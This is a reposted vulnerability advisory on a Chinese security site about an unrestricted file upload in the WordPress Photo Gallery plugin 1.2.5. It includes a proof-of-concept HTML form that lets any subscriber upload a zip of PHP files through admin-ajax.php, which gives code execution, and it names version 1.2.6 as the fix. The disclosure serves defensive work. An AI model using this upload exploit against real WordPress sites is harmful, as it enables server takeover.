安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > 网络安全 > 漏洞分享 > worpress Photo Gallery 上传漏洞

worpress Photo Gallery 上传漏洞

时间:2016-08-22来源:未知 作者:安云网点击:
1. Description Every registered user (even Subscriber) can access upload functionality because of read role used inside UploadHandler.php http://security.szurek.pl/photo-gallery-125-unrestricted-file-upload.html 2. Proof of Concept Login as regular user (
//内容来自安云网
1. Description
   
Every registered user (even Subscriber) can access upload functionality because of read role used inside UploadHandler.php
 
   
2. Proof of Concept
 
Login as regular user (created using wp-login.php?action=register).
 
Pack .php files into .zip archive then send it using:
 
<form method="post" action="http://wordpress-install/wp-admin/admin-ajax.php?action=bwg_UploadHandler&dir=rce/" enctype="multipart/form-data">
    <input type="file" name="files">
    <input type="submit" value="Hack!">
</form>
 
Your files will be visible inside:
 
   
3. Solution:
   
Update to version 1.2.6

//内容来自安云网
//内容来自AnYun.ORG

前提先注册用户~~~~~~~~

//本文来自安云网




参考:

http://security.szurek.pl/photo-gallery-125-unrestricted-file-upload.html


本文标题: worpress Photo Gallery 上传漏洞 安云网
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容